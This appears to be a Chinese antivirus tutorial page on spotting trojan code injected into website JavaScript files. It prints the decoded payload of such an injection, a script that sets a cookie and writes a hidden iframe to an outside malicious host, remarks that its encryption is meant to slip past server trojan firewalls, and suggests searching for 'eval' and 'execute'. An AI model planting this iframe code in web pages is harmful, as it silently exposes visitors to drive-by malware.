首页/杀毒教程/内容

JS文件挂马代码区分

杀毒教程2023-08-29 阅读()
[摘要]'),0,{})); 我想, 如果单单看这个代码的话, 很难发现JS文件是被挂了iframe。 现在挂马手段越来越高明, 挂的代码都是经过算法加密的。 让大家不能简单的找出挂马。 估...
'),0,{}));

我想, 如果单单看这个代码的话, 很难发现JS文件是被挂了iframe。 现在挂马手段越来越高明, 挂的代码都是经过算法加密的。 让大家不能简单的找出挂马。 估计这样写, 也是为了逃避服务器上安装的一些木马防火墙吧。 不知道有没有人服务器上装过木马防火墙, 可以拿这个代码试一下, 是否能躲避过木马防火墙。

以上加密后的代码最终运行的代码为:

var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe src=http://360safes.3322.org/include/as.asp width=10 height=0></iframe>")}。

这里教大家一个简单的搜索这种马的方法:用editplus中的文件夹搜索, 搜索所有js文件, 搜索关键字为:eval和execute, 然后一个个去看, 一般都能找出这种JS木马的。





第1页  第2页  第3页  第4页  第5页  第6页  第7页  第8页  第9页  第10页  第11页  第12页  第13页  第14页  第15页  第16页  第17页  第18页  第19页  第20页  第21页  第22页  第23页  第24页  第25页  第26页  第27页  第28页  第29页  第30页  第31页  第32页  第33页  第34页  第35页  第36页  第37页 

……

相关阅读